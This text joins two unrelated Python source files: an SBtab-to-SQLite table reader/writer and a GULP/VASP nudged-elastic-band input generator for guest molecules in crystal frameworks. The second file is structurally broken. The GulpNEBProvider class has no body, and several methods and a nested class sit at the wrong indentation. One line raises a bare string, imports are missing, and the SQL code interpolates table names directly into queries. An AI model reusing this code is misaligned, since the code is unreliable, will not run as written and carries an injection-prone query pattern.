import tablibIO
import sqlite3
class SBtabDict(dict):
    """A dict mapping table names to SBtabTable objects, with SBtab <-> SQLite I/O.

    NOTE(review): this module uses Python 2 semantics in places (``map``
    results consumed as lists, ``map(None, ...)``) -- confirm the target
    interpreter version before reuse.
    """

    def __init__(self, sbtab_list):
        """
        Arguments:
            sbtab_list - a list of SBtabTable objects
        """
        # Path of the file the tables were loaded from; set by the factories.
        self.fpath = ''
        self.sbtab_list = sbtab_list
        # Index every table by its name for dict-style access.
        for m in sbtab_list:
            self[m.table_name] = m

    @staticmethod
    def FromSBtab(fpath):
        """Load an SBtabDict from a (possibly multi-table) SBtab TSV file."""
        spreadsheet_file = tablibIO.loadTSV(fpath, False)
        # Split the single spreadsheet into one dataset per SBtab table.
        m = misc.split_sbtabs(spreadsheet_file)
        sbtab_list = [SBtabTable(dset, fpath) for dset in m]
        sbtab_dict = SBtabDict(sbtab_list)
        sbtab_dict.fpath = fpath
        return sbtab_dict

    def GetColumnFromTable(self, table_name, column_name):
        """
        Returns:
            a list of the values in the column called 'column_name'
            in the table 'table_name'
        """
        # Column names are stored with a '!' prefix in columns_dict.
        column_index = self[table_name].columns_dict['!' + column_name]
        rows = self[table_name].getRows()
        return [r[column_index] for r in rows]

    def GetColumnsFromTable(self, table_name, column_names):
        """
        Arguments:
            table_name   - the name of the table in the SBtab file (without '!!')
            column_names - a list of column names from which to get the data (without '!')

        Returns:
            a list of lists containing the values corresponding to the
            columns in 'column_names' in the table 'table_name'
        """
        try:
            idxs = [self[table_name].columns_dict['!' + c] for c in column_names]
        except KeyError as e:
            all_columns = ', '.join(self[table_name].columns_dict.keys())
            raise KeyError('Cannot find the column %s in table "%s" in file %s. '
                           'Columns are: %s'
                           % (e, table_name, self.fpath, all_columns))
        # NOTE(review): under Python 3 each row here is a lazy map object,
        # not a list -- callers relying on list semantics assume Python 2.
        return [map(r.__getitem__, idxs) for r in self[table_name].getRows()]

    def GetDictFromTable(self, table_name, key_column_name, value_column_name,
                         value_mapping=None):
        """Return {key value: mapped value} pairs from two columns of a table.

        NOTE(review): value_mapping=None relies on Python 2's map(None, ...)
        identity behaviour; under Python 3 this raises TypeError.
        """
        column_names = [key_column_name, value_column_name]
        keys, vals = zip(*self.GetColumnsFromTable(table_name, column_names))
        return dict(zip(keys, map(value_mapping, vals)))

    def GetTableAttribute(self, table_name, attribute_name):
        """
        Arguments:
            table_name     - the name of the table in the SBtab file (without '!!')
            attribute_name - a string with the attribute name

        Returns:
            A string containing the value of the attribute in that table,
            or None if the attribute does not exist
        """
        try:
            return self[table_name].getCustomTableInformation(attribute_name)
        except SBtabError:
            return None

    def SBtab2SQL(self, comm, append=False):
        """Write all tables into the SQLite connection 'comm'.

        Maintains __tables__ / __columns__ metadata tables, then creates one
        SQL table per SBtab table. With append=False an existing table is
        dropped and recreated; with append=True rows are added to it.

        NOTE(review): table and column names are interpolated directly into
        the SQL text, so names containing quotes (or hostile input) would
        break or inject -- acceptable only for trusted SBtab files.
        """
        comm.execute("CREATE TABLE IF NOT EXISTS __tables__ (TableName TEXT, TableType TEXT, "
                     "header TEXT)")
        comm.execute("CREATE TABLE IF NOT EXISTS __columns__ (TableName TEXT, idx INT, ColumnName TEXT)")
        for m in self.sbtab_list:
            # get the names of the columns in the right order (i.e. so that
            # the corresponding column indices will be 0..n)
            columns = sorted(m.columns, key=m.columns_dict.get)
            # Strip the leading '!' and drop empty column names.
            columns = map(lambda c: str(c[1:]), columns)
            columns = [c for c in columns if c != '']
            rows = list(comm.execute("SELECT * FROM __tables__ "
                                     "WHERE TableName = '%s'" % m.table_name))
            if len(rows) > 0:
                # if the table already exists, make sure that the metadata is
                # the same as in the SBtab.
                tname, ttype, theader = rows[0]
                assert ttype == m.table_type
                assert theader == m._getHeaderRow()
                # TODO: also assert that the columns are exactly the same as before
                if not append:
                    comm.execute("DROP TABLE %s" % m.table_name)
            else:
                # if the table doesn't already exist, add an entries for it
                # in the __tables__ and __columns__
                comm.execute("INSERT INTO __tables__ VALUES(?,?,?)",
                             [m.table_name, m.table_type, m._getHeaderRow()])
                for i, col in enumerate(columns):
                    comm.execute("INSERT INTO __columns__ VALUES(?,?,?)",
                                 [m.table_name, i, col])
            col_text = ','.join(['\'%s\' TEXT' % col for col in columns])
            comm.execute("CREATE TABLE IF NOT EXISTS %s (%s)" % (m.table_name, col_text))
            # copy the data from the SBtab table into the relevant table in the
            # database.
            ins_command = "INSERT INTO %s VALUES(%s)" % \
                          (m.table_name, ','.join(["?"]*len(columns)))
            for i, row in enumerate(m.getRows()):
                # Truncate over-long rows to the declared column count.
                if len(row) > len(columns):
                    row = row[0:len(columns)]
                comm.execute(ins_command, row)
        comm.commit()

    @staticmethod
    def FromSQLite(fpath):
        """
        Read all tables from a SQL database into an SBtab object.

        This function assumed that the database has one table
        called __tables__ with the relevant header fields for SBtab
        """
        comm = sqlite3.connect(fpath)
        # Fail fast if this is not an SBtab-style database.
        assert list(comm.execute("SELECT name FROM sqlite_master WHERE name='__tables__'")) != []
        # table_types is currently unused below.
        table_names, table_types, headers = \
            zip(*comm.execute("SELECT TableName, TableType, header from __tables__"))
        sbtabs = []
        for table_name, header in zip(table_names, headers):
            # Recover the ordered column list recorded in __columns__.
            columns = []
            for c in comm.execute("SELECT ColumnName from __columns__ WHERE "
                                  "TableName == '%s' ORDER BY idx" % table_name):
                columns.append(c[0])
            # Rebuild the tablib dataset: header row, '!'-prefixed column
            # row, then the data rows.
            sbtab = tablib.Dataset()
            sbtab.rpush([header] + [''] * (len(columns)-1))
            sbtab.rpush(map(lambda s: '!' + s, columns))
            for row in comm.execute("SELECT * FROM '%s'" % table_name):
                sbtab.append(row)
            sbtabs.append(sbtab)
        sbtab_list = [SBtabTable(dset, fpath) for dset in sbtabs]
        sbtab_dict = SBtabDict(sbtab_list)
        sbtab_dict.fpath = fpath
        comm.close()
        return sbtab_dict
|
"""Provides specific NEB provider implementations (e.g. GULP and VASP), freeing users from such complexities.
"""
import os
import subprocess as sb # run()
from PyLib.TinyParser import TinyParser
from Errors import AppError
class GulpNEBProvider:
class GinFileTemplate:
    """After initialisation with a model GULP .gin input file, the object becomes template for creating .gin files."""
    def __init__(self,sExistingAtomTyperGinFilePath,iNumGuestAtoms):
        """Initialise object.
        [sExistingAtomTyperGinFilePath]: string, existing GULP .gin file name and path.
        [iNumGuestAtoms]: int, number of guest atoms.
        """
        self.sGinFileHeaderAndHostAtomData=None # top of .gin file
        self.lsGuestAtomLabelsAndSpeciesTypes=[] # list of guest atom labels and species-types
        self.sGinFileBondsSpeciesAndLibraryContent=None # bottom of .gin file
        self.ParseGinFile(sExistingAtomTyperGinFilePath,iNumGuestAtoms)
    def ParseGinFile(self,sExistingAtomTyperGinFilePath,iNumGuestAtoms):
        """Parse everything but the guest molecule coordinates from the GULP .gin input file.
        Expect AtomTyper-created .gin file in following format:
            <header-lines>
            vectors
            <lattice-vector-lines>
            cartesian
            <atom-data(host)>+
            <atom-data(guest)>+
            connect ...
        where <atom-data>:= <atom-label> <species-type> <position-x> <position-y> <position-z>
        [sExistingAtomTyperGinFilePath]: string, existing GULP .gin file name and path.
        [iNumGuestAtoms]: int, number of guest atoms.
        """
        # 1. move to last guest atom data
        parser= TinyParser(None,sExistingAtomTyperGinFilePath)
        parser.Anchor()
        parser.MoveTo("\nvectors",1) # moving initially beyond 'vectors' is a risk-reduction tactic
        parser.MoveTo("\nconnect",0) # now jump to 'connect'
        self.sGinFileBondsSpeciesAndLibraryContent= parser.sContent[parser.iThisChar+1:] # keep bottom half of .gin file
        parser.Step(-1)
        while parser.sContent[parser.iThisChar].isspace(): parser.Step(-1) # rid any prior space or newlines
        # 2. now on <position-z> of last guest atom; for N guest atoms, want to find N prior \n 's
        for iThisGuestAtom in range(iNumGuestAtoms): parser.MoveTo("\n",-1,bReverse=True) # each move sets position just before newline
        parser.Step(2) # step over newline to first guest atom
        self.sGinFileHeaderAndHostAtomData= parser.Copy() # keep top half of .gin file
        # 3. read atom label and species type
        # NOTE(review): relies on TinyParser's EatWord/EatSpace/EatLine
        # advancing exactly one atom-data line per iteration -- confirm
        # against TinyParser's semantics before changing.
        for iThisGuestAtom in range(iNumGuestAtoms):
            sAtomLabel= parser.EatWord()
            parser.EatSpace()
            sSpeciesType= parser.EatWord() # 'core', 'shell', 'bcor', 'bshe' - see GULP 6.0 manual PDF, p.134
            self.lsGuestAtomLabelsAndSpeciesTypes.append( (sAtomLabel,sSpeciesType) )
            parser.EatLine()
    def Render(self,lsGuestAtomCartesPositions):
        """Render the .gin file.
        Loading .gin files calculated earlier has two principal benefits:
        1. on examining a host-guest crystal, AtomTyper creates *guest-position dependent* bonds and atomtypes. As free guest trajectories are sought, any underisable bond/atomtype changes lead to inconsistent energy calculations, i.e. for the energy barrier as guests move through the channel and window position. Fixing host-guest bonds/atomtypes excludes such changes to focus on the primary goal of seeking free guest trajectories.
        2. AtomTyper occasionally takes a long time to generate .gin files; so a performance boost is achieved by taking host-guest bonds/atomtypes from an earlier-calculated system - with the guest in a sensible position distant from the host framework.
        [lsGuestAtomCartesPositions]: list, guest atom cartesian positions.
        <retval>: string, created GULP .gin input file.
        """
        # Header/host half, then one tab-separated line per guest atom
        # (label, species type, x, y, z to 8 d.p.), then the bonds half.
        sOut= self.sGinFileHeaderAndHostAtomData
        for iThisGuestAtom,lsAtomCartesPosition in enumerate(lsGuestAtomCartesPositions):
            sGuestAtomLabel,sSpeciesType= self.lsGuestAtomLabelsAndSpeciesTypes[iThisGuestAtom]
            sOut+=f"{sGuestAtomLabel}\t{sSpeciesType}\t{lsAtomCartesPosition[0]:.8f}\t{lsAtomCartesPosition[1]:.8f}\t{lsAtomCartesPosition[2]:.8f}\n"
        sOut+= "\n"+self.sGinFileBondsSpeciesAndLibraryContent
        return sOut
def __init__(self,fnXmlAttr,xnGULPSetup,sRootOutputDir,sHostGuestName,crystalAndGuest,lsWindowDistanceStepAngstrom,ginFileTemplate,crystalGuestState):
    """Initialise the GULP NEB provider.
    This provider creates a [HOST_GUEST_STEPSIZE.replicas] file (listing all atom positions through the trajectory) and two [HOST_GUEST_STEPSIZE_SideNumber.gin] files (for GULP to relax each endpoint). As host CIF-file atom labels differ from those required my GULP (for which atoms with identical bond-types need identical atom labels), all atom labels featuring in [HOST_GUEST_STEPSIZE.replicas] need mapping from their CIF label to their GULP-compatible atom label (as created by Atomtyper).
    Mapping may occur either as [HOST_GUEST_STEPSIZE.replicas] is created, or as a post-creation parse process. Atomtyper *could* run only on the left/rightmost replicas, yet these are only known later in the trajectory-discovery process, and so would require writing the replicas file either later (undesirable, as wish to log content immediately, and also to avoid holding lots in memory), or at finish time parsing/updating each replicas file atom label; as each crystal can have >1000 atoms, the latter approach is expected to give poor performance, so here Atomtyper runs initially to get GULP-compatible atom labels from the window image prior to any replica work. Identical atom labels are expected for each stepsize/image.
    [fnXmlAttr]: XmlAttr function for reading config-file attributes.
    [xnGULPSetup]: XmlNode, config file GULP setup node.
    [sRootOutputDir]: string, root output directory path.
    [sHostGuestName]: string, formal 'host_guest' name for this system.
    [crystalAndGuest]: crystal object describing the host with the guest at the window.
    [lsWindowDistanceStepAngstrom]: list of step sizes (Angstrom) to track.
    [ginFileTemplate]: GinFileTemplate, allowing creation of GULP .gin input files from an template created earlier.
    [crystalGuestState]: MoleculePosition, guest position for this image.
    """
    self.fnXmlAttr= fnXmlAttr
    self.xnGULPSetup= xnGULPSetup
    self.lsGULPAtomTyperLabels=None # list of guest molecule atom labels (which also designate GULP bond types); listed in same order as crystal.dtAtoms.
    self.ginFileTemplate= ginFileTemplate
    # Relaxation input for the window image itself (True marks it as such).
    self._CreateGULPOptimisationFile(sRootOutputDir,sRootOutputDir+sHostGuestName+".cif",len(crystalAndGuest.dtAtoms),True,crystalGuestState)
    # Per-step-size replica bookkeeping; each entry is a dict of the form
    # {sFileBody=None, iNumLeftImages=0, iNumRightImages=0}
    # 1. add GULP text for window position with 0 position for each interval step
    # 2. insert GULP text prior for each LEFT image with incrementing integer
    # 3. append GULP text post for each RIGHT image with incromenting integer
    # 4. then have 3 2 1 0 4 5 6 7 with 3 left, 4 right = 8 length
    # 5a. fix right, working backwards: for iThisLabel in range(iNumLeft+iNumRight,iNumLeft,-1): replace({iThisLabel},iThisLabel+1)
    # 5b. fix window: replace({0},iNumLeft+1)
    # 5c: fix left, working bacwards: for iThisLabel in range(1,iNumLeft+1): replace({iThisLabel},iNumLeft+1-iThisLabel)
    self.lsEachIntervalReplicaMetaData=[]
    self.lsWindowDistanceStepAngstrom= lsWindowDistanceStepAngstrom
    self.AddWindowImages(crystalAndGuest)
@staticmethod
def CreateGinFileTemplate(fnXmlAttr,xnGULPSetup,sHostGuestName,iNumGuestAtoms):
"""Create a GULP .gin input file template object if config file specifies such.
[fnXmlAttr]: XmlAttr function.
[xnGULPSetup]: XmlNode, config file GULP setup node.
[sHostGuestName]: string, formal 'host_guest' name for this system.
[iNumGuestAtoms]: int, number of guest atoms.
<retval>: GinFileTemplate object for this MOF and guest, or None when not needed.
"""
sUseExistingAtomtyperGins= fnXmlAttr(xnGULPSetup,"useExistingAtomtyperGins",False)
bUseExistingAtomtyperGins= int(sUseExistingAtomtyperGins)==1 if sUseExistingAtomtyperGins is not None else False
if bUseExistingAtomtyperGins:
sExistingAtomTyperGinFilePath= fnXmlAttr(xnGULPSetup,"atomTyperExistingGinsDirPath",True)
sExistingAtomTyperGinFilePath+=sHostGuestName+".gin"
return GulpNEBProvider.GinFileTemplate(sExistingAtomTyperGinFilePath,iNumGuestAtoms)
else:
return None
def AddWindowImages(self,crystalAndGuest):
    """Add initial images for all step sizes with the guest at the window.
    [crystalAndGuest]: Crystal.crystal.Crystal object, describing guest position in this host crystal.
    """
    # Every step size starts from the identical window-position replica
    # (placeholder label "0"); each gets its own metadata dict.
    sWindowReplicaBody= self._GulpNEBReplicaContentForImage(crystalAndGuest,str(0))
    self.lsEachIntervalReplicaMetaData.extend(
        {'sFileBody':sWindowReplicaBody, 'iNumLeftImages':0, 'iNumRightImages':0}
        for _ in self.lsWindowDistanceStepAngstrom)
def AddNextImage(self,crystalAndGuest,iGuestDisplaceIntervalIndex,bLeftDisplaceSide,bEndpoint,sHostGuestStepSizeGulpDir,sCifFileNamePath,crystalGuestState):
    """Add the next image (with the guest displaced from the window) for a specific step size and window side. Images must be added from the window outwards: first from the left-side, then from the right-side. The content then contains placeholders with image numbers for this sequence (e.g. 3 2 1 0 4 5 6 7 with 3 left, 4 right) which are replaced on Save().
    [crystalAndGuest]: Crystal.crystal.Crystal object, describing guest position in this host crystal.
    [iGuestDisplaceIntervalIndex]: int, index of step size in [lsWindowDistanceStepAngstrom].
    [bLeftDisplaceSide]: bool, image on left of window; else on right of window.
    [bEndpoint]: bool, this is the endpoint - the final image on this side of the window.
    [sHostGuestStepSizeGulpDir]: string, path to host-guest-stepsize/GULP/ directory.
    [sCifFileNamePath]: string, CIF file name/path for this host and guest image.
    [crystalGuestState]: MoleculePosition, guest position for this image.
    """
    dtMetaData= self.lsEachIntervalReplicaMetaData[iGuestDisplaceIntervalIndex]
    # Count this image on its side of the window and build its placeholder
    # label: left images are "1","2",...; right images are "R1","R2",....
    if bLeftDisplaceSide:
        dtMetaData['iNumLeftImages']+=1
        sPlaceholderLabel= str(dtMetaData['iNumLeftImages'])
    else:
        dtMetaData['iNumRightImages']+=1
        sPlaceholderLabel= "R"+str(dtMetaData['iNumRightImages'])
    sReplicaBody= self._GulpNEBReplicaContentForImage(crystalAndGuest,sPlaceholderLabel)
    # Left-side images are prepended, right-side images appended, keeping the
    # replica bodies in trajectory order around the window image.
    if bLeftDisplaceSide:
        dtMetaData['sFileBody']= sReplicaBody+dtMetaData['sFileBody']
    else:
        dtMetaData['sFileBody']= dtMetaData['sFileBody']+sReplicaBody
    if bEndpoint:
        # Endpoints additionally get a GULP relaxation input file.
        self._CreateGULPOptimisationFile(sHostGuestStepSizeGulpDir,sCifFileNamePath,len(crystalAndGuest.dtAtoms),False,crystalGuestState)
@staticmethod
def _FileNameNoExtension(sFileNamePath):
"""Extract the file name (without extension) from the given file name path.
[sFileNamePath]: string, file name and path.
<retval>: tuple (string, file name; int, extension index).
<except>: AppError, on missing extension or directory name.
"""
iExtensionIndex= sFileNamePath.rfind(".")
if iExtensionIndex==-1: raise AppError("Failed finding extension in file name [%s]." % sFileNamePath)
iLastSlash= sFileNamePath.rfind("/")
if iLastSlash==-1: iLastSlash= sFileNamePath.rfind("\\")
if iLastSlash==-1: raise AppError("Failed finding directory in file name [%s]." % sFileNamePath)
return sFileNamePath[iLastSlash+1:iExtensionIndex],iExtensionIndex
    def _SaveRevisedGinFile(self,sHostGuestStepSideNameNoExtension,sGinFileContent,iVectorsPos,sGinFileName):
        """Save an AtomTyper-generated GULP .gin file after replacing the header (pre-'vectors') and library with config file entries.
        [sHostGuestStepSideNameNoExtension]: string, HostGuestStepSide file name without extension.
        [sGinFileContent]: string, AtomTyper-generated GULP .gin file content.
        [iVectorsPos]: int, position of '\nvectors' marker in this content.
        [sGinFileName]: string, .gin file name and path.
        <except>: AppError, if errors in config file or .gin file.
        """
        # config must contain exactly one [GULPSetup].[inputFileHeader] child element
        if len(self.xnGULPSetup)!=1 or self.xnGULPSetup[0].tag!="inputFileHeader":
            raise AppError(f"Config file missing expected [GULPSetup].[inputFileHeader] element.");
        sInputFileHeader= self.xnGULPSetup[0].text
        # strip the XML indentation carried by each header line
        sInputFileHeader= "\n".join([sHeaderLine.lstrip() for sHeaderLine in sInputFileHeader.strip().split("\n")])
        if sInputFileHeader.find("[FILENAME]")==-1:
            raise AppError(f"Config file [GULPSetup].[inputFileHeader] element missing required [FILENAME] marker.");
        # the [FILENAME] marker names the relaxed-structure output files
        sInputFileHeader= sInputFileHeader.replace("[FILENAME]",sHostGuestStepSideNameNoExtension+"-relaxed")
        # write new GULP optimisation input file:
        # keep original content between 'vectors' and the final 'library' line, then swap in the configured library
        iLibraryPos= sGinFileContent.rfind("library")
        if iLibraryPos==-1: raise AppError(f"'library' keyword missing from GULP optimisation input file [{sGinFileName}]");
        sInputFileLibrary= self.fnXmlAttr(self.xnGULPSetup,"inputFileLibrary",True)
        with open(sGinFileName,"w") as hFile:
            hFile.write(sInputFileHeader+sGinFileContent[iVectorsPos:iLibraryPos]+f"library {sInputFileLibrary}\n")
def _GetAtomTyperLabelsAndDeleteGinFile(self,sGinFileContent,iVectorsPos,sGinFileName,iNumAtoms,bDeleteFile):
"""Get a list of atom labels from this AtomTyper-generated .gin file content, then delete the .gin file.
[sGinFileContent]: string, GULP .gin file content.
[iVectorsPos]: int, position of '\nvectors' marker in this content.
[sGinFileName]: string, .gin file name and path.
[iNumAtoms]: int, number of atoms expected.
[bDeleteFile]: bool, delete the .gin file before return.
<retval>: list of atom labels.
<except>: AppError, if number of expected atoms and .gin files differ.
"""
# return atom labels as generated by atomtyper.py.
sMarker="cartesian"
iStartIndex= sGinFileContent.find(sMarker,iVectorsPos)
if iStartIndex==-1: raise(f"'cartesian' keyword missing from GULP optimisation input file [{sGinFileName}]");
iStartIndex+=len(sMarker)
parser= TinyParser(sGinFileContent[iStartIndex:])
lsAtomTyperLabels=[]
while True:
parser.EatLine()
sAtomLabel= parser.EatWord()
if sAtomLabel=="": break # empty line after atom positions designates list end (although not yet file end).
elif len(lsAtomTyperLabels)>=iNumAtoms:
raise AppError(f"GULP optimisation input file [{sGinFileName}] has {len(lsAtomTyperLabels)+1} on this iteration; yet only {iNumAtoms} are expected.")
else: lsAtomTyperLabels.append(sAtomLabel)
# delete new GULP file now - was only needed for atom labels. Will leave the .stdouterr file for now.
if bDeleteFile: os.remove(sGinFileName)
return lsAtomTyperLabels
    def _CreateGULPOptimisationFile(self,sHostGuestStepSizeGulpDirPath,sHostGuestEndPointCifFilePath,iNumAtoms,bGetAtomLabelsOnly,crystalGuestState):
        """Create GULP .gin file for guest trajectory endpoint (most distant image), via the AtomTyper utility or a provided .gin template.
        [sHostGuestStepSizeGulpDirPath]: string, host-guest-step/GULP/ directory path.
        [sHostGuestEndPointCifFilePath]: string, end-point CIF file name and path.
        [iNumAtoms]: int, number of atoms expected.
        [bGetAtomLabelsOnly]: bool, running only to harvest atom labels (an AtomTyper-generated .gin is deleted afterwards); else, write the optimisation .gin file.
        [crystalGuestState]: MoleculePosition, guest position for this image.
        """
        if self.ginFileTemplate is None:
            # create GULP optimisation (.gin) file as no equivalent file provided
            tpGinFile_Content_VectorPos_FilePath= self._RunAtomTyperToCreateGinFromCifFile(
                sHostGuestStepSizeGulpDirPath,sHostGuestEndPointCifFilePath,bGetAtomLabelsOnly)
            if bGetAtomLabelsOnly: # client only wants the host-guest atom labels; remove the .gin file
                sGULPOptimisationInput,iVectorsPos,sGinFilePath= tpGinFile_Content_VectorPos_FilePath
                self.lsGULPAtomTyperLabels= self._GetAtomTyperLabelsAndDeleteGinFile(sGULPOptimisationInput,iVectorsPos,sGinFilePath,iNumAtoms,True)
        else: # read .gins from provided directory and insert atom coords
            sGinFilePath= sHostGuestStepSizeGulpDirPath+(self._FileNameNoExtension(sHostGuestEndPointCifFilePath)[0])+".gin"
            if bGetAtomLabelsOnly:
                # render the template only to harvest atom labels; pass False so the file is kept
                sGULPOptimisationInput= self.ginFileTemplate.Render(crystalGuestState.lsOrientedGuestAtomCartesPos)
                iVectorsPos= sGULPOptimisationInput.find('\nvectors')
                if iVectorsPos==-1:
                    # NOTE(review): raises generic Exception while sibling methods raise AppError - confirm intended
                    raise Exception("Failed finding vectors in template content for "+sHostGuestEndPointCifFilePath)
                self.lsGULPAtomTyperLabels= self._GetAtomTyperLabelsAndDeleteGinFile(sGULPOptimisationInput,iVectorsPos,sGinFilePath,iNumAtoms,False)
            else:
                sGULPOptimisationInput= self.ginFileTemplate.Render(crystalGuestState.lsOrientedGuestAtomCartesPos)
                # ensure the GULP/ output directory exists before writing the rendered file
                iIndex= sGinFilePath.rfind("/")
                os.makedirs(sGinFilePath[:iIndex],exist_ok=True)
                with open(sGinFilePath,"w") as fGinFile:
                    fGinFile.write(sGULPOptimisationInput)
    def _RunAtomTyperToCreateGinFromCifFile(self,sHostGuestStepSizeGulpDir,sHostGuestEndPointCifFilePath,bDontSaveRevisedGinFile):
        """Create GULP .gin file for guest trajectory endpoint (most distant image) via AtomTyper utility.
        [sHostGuestStepSizeGulpDir]: string, host-guest-step/GULP/ directory path.
        [sHostGuestEndPointCifFilePath]: string, end-point CIF file name and path.
        [bDontSaveRevisedGinFile]: bool, don't save a revised .gin file, presumably as running AtomTyper only to read atom labels.
        <retval>: if [bDontSaveRevisedGinFile], tuple (string: created .gin file output; int: position of lattice vectors data; string: .gin file path); else, None.
        """
        # AtomTyper requires a separately-configured Python 2.7 interpreter (per the config attribute name)
        sPythonExecutable27= self.fnXmlAttr(self.xnGULPSetup,"pythonExecutable2-7",True)
        sAtomTyperDir= self.fnXmlAttr(self.xnGULPSetup,"atomTyperUtilPath",True)
        sShellTextEncoding= self.fnXmlAttr(self.xnGULPSetup,"shellTextEncoding",True) # "cp850" (Windows, or see Console\Properties\Options\Current code page), "UTF-8" (Linux), etc. See https://docs.python.org/3/library/codecs.html#standard-encodings
        # NOTE(review): 'sb' is assumed to alias the subprocess module (imported elsewhere in this file) - confirm
        retVal= sb.run( [sPythonExecutable27, sAtomTyperDir+"atomtyper.py", "-f", sHostGuestEndPointCifFilePath,
            "-l", sAtomTyperDir+"libraries/uff4mof.csv", "-r", sAtomTyperDir+"libraries/rappe.csv"],
            stdout=sb.PIPE,stderr=sb.STDOUT,encoding=sShellTextEncoding) # See: https://docs.python.org/3/library/subprocess.html
        # encoding does retVal.stdout.decode(sShellTextEncoding), e.g. "cp850", "UTF-8".
        # write AtomTyper .stdouterr for debugging purposes
        sHostGuestStepSizeNameNoExtension,iExtensionIndex= self._FileNameNoExtension(sHostGuestEndPointCifFilePath)
        sErrFileName= f"{sHostGuestStepSizeGulpDir}{sHostGuestStepSizeNameNoExtension}.stdouterr"
        if not os.access(sHostGuestStepSizeGulpDir,os.F_OK): os.mkdir(sHostGuestStepSizeGulpDir)
        with open(sErrFileName,"w",newline="") as hFile: # don't translate console newline characters.
            # see https://docs.python.org/release/3.2/library/functions.html#open
            hFile.write(retVal.stdout)
        # AtomTyper creates .gin file in same directory as CIF file, so move to new output directory (as necessary)
        sCurrentGULPFilePath= f"{sHostGuestEndPointCifFilePath[:iExtensionIndex]}.gin"
        sNewGULPFilePath= f"{sHostGuestStepSizeGulpDir}{sHostGuestStepSizeNameNoExtension}.gin"
        if not bDontSaveRevisedGinFile and sCurrentGULPFilePath!=sNewGULPFilePath:
            if os.access(sNewGULPFilePath,os.F_OK): os.remove(sNewGULPFilePath)
            os.rename(sCurrentGULPFilePath,sNewGULPFilePath)
        # read AtomTyper's created GULP optimisation .gin input file, which requires some replacements
        # NOTE(review): when [bDontSaveRevisedGinFile] and the two paths differ, the file is read from
        # sNewGULPFilePath without having been moved there - confirm this path is always valid in that mode
        with open(sNewGULPFilePath,"r") as hFile:
            sGULPOptimisationInput= hFile.read()
        iVectorsPos= sGULPOptimisationInput.find("\nvectors")
        if iVectorsPos==-1: raise AppError(f"'vectors' keyword missing from GULP optimisation input file [{sNewGULPFilePath}]");
        if bDontSaveRevisedGinFile:
            return sGULPOptimisationInput,iVectorsPos,sNewGULPFilePath
        else:
            self._SaveRevisedGinFile(sHostGuestStepSizeNameNoExtension,sGULPOptimisationInput,iVectorsPos,sNewGULPFilePath)
            return None
    def _GulpNEBReplicaContentForImage(self,crystal,sGulpTemporaryImageIndexKey):
        """Generate GULP NEB replica content for this step (image).
        Replica content details lattice parameters and atom positions. The final GULP NEB .gin input file combines additional header/footer content with replica content for each step.
        [crystal]: crystal object representing the crystal and molecule for this step.
        [sGulpTemporaryImageIndexKey]: string; GULP image index key, to be replaced later with correct index (once the number of steps is known). Correct index is an ascending integer with leftmost image having index 1, window having index (NumLeftImages+1) and rightmost image having index (NumLeftImages+NumRightImages+1); however, calculation moves outwards from window, so window has temporary key 0, left images have ascending 1-based key integers outwards from the window, while right images have ascending key strings R1, R2, R3 ... outwards from the window.
        <retval>: string, replica content for this step.
        """
        # NOTE: the literal '{' '}' survive the %-substitution, so the body contains
        # "{<key>}" placeholders (e.g. "{0}", "{R1}") which Save() later fills via str.format
        sBody= "rcell {%s}\n %.6f %.6f %.6f %.6f %.6f %.6f\nrfractional {%s}\n" % (
            sGulpTemporaryImageIndexKey,*crystal.lsLatticeParams,*crystal.lsLatticeVectorAnglesDegrees,sGulpTemporaryImageIndexKey)
        # one "label core x y z" row per atom, using the AtomTyper-derived labels in atom order
        for iAtom,thisAtom in enumerate(crystal.dtAtoms.values()):
            #NOTE: previously used 'rcartesian' rather than 'rfractional' with below and %.6f output:
            #arAtomCartesVector= cgeom.FractionalToCartesianVector(None,thisAtom.lsFracLatticePos,crystal.lsCartesianLatticeVectors)
            sBody+= "%s core %.8f %.8f %.8f\n" % (self.lsGULPAtomTyperLabels[iAtom],
                thisAtom.lsFracLatticePos[0],thisAtom.lsFracLatticePos[1],thisAtom.lsFracLatticePos[2])
        return sBody
    def Save(self,fnHostGuestStepSizeName,sHostGuestName,sRootOutputDir,sTrajectoryMethod):
        """Save the GULP '.replicas' file for each step size. The remaining GULP tasks are completed in a subsequent step, i.e. GULP-relaxing endpoints and writing the '_NEB.gin' file.
        [fnHostGuestStepSizeName]: function, HostGuestStepSizeName(sHostGuestName,fWindowDistanceStepAngstrom) giving specified host-guest-stepsize name for relevant files.
        [sHostGuestName]: string, crystal host-guest-step-size name.
        [sRootOutputDir]: string, root output directory.
        [sTrajectoryMethod]: string, trajectory method formal name.
        """
        for iInterval,fWindowDistanceStepAngstrom in enumerate(self.lsWindowDistanceStepAngstrom):
            sHostGuestStepSizeName= fnHostGuestStepSizeName(sHostGuestName,fWindowDistanceStepAngstrom)
            sHostGuestStepSizeDir= f"{sRootOutputDir}{sHostGuestStepSizeName}/{sTrajectoryMethod}/"
            #CHANGE: below line thought unnecessary, so removed in this refactor. Rid if confirm same results
            #crystalAndGuest.WriteCIF(f"{sHostGuestStepSizeDir}{sHostGuestStepSizeName}_{'L' if bLeftDisplaceSide else 'R'}{iPositionIndex}.cif")
            sHostGuestStepGulpDirPath= sHostGuestStepSizeDir+"GULP/"
            if not os.access(sHostGuestStepGulpDirPath,os.F_OK):
                os.mkdir(sHostGuestStepGulpDirPath) # GULP/ dir may not exist if same L and R steps fail (e.g. 0.25 Angstrom). Just creating dir today until have better solution.
            sReplicasFileName= sHostGuestStepGulpDirPath+sHostGuestStepSizeName+".replicas"
            # GULPFileBody currently has label sequence, e.g. 3 2 1 0 4 5 6 7 with 3 left, 4 right = 8 length.
            # so update the labels {0} so they have ascending sequence from start to end of file
            iNumLeftImages= self.lsEachIntervalReplicaMetaData[iInterval]['iNumLeftImages']
            iNumRightImages= self.lsEachIntervalReplicaMetaData[iInterval]['iNumRightImages']
            # temporary right-side keys R1..Rn map to final indices (window+1)..(window+n), window = iNumLeftImages+1
            dtRightImageKeywords= {'R'+str(iRightImageIndex):(iNumLeftImages+iRightImageIndex+1) for iRightImageIndex in range(1,iNumRightImages+1)}
            # positional args: temporary key 0 (window) -> iNumLeftImages+1; left key i (counted outwards) -> iNumLeftImages+1-i
            lsAscendSequence= [iNumLeftImages+1]+list(range(iNumLeftImages,0,-1))
            sGULPFileBody= self.lsEachIntervalReplicaMetaData[iInterval]['sFileBody'].format(*lsAscendSequence,**dtRightImageKeywords)
            with open(sReplicasFileName,"w") as hFile:
                hFile.write(sGULPFileBody)
class VaspNEBProvider:
    """Builds VASP POSCAR input files (one per image, per step size) for an NEB guest-trajectory calculation."""
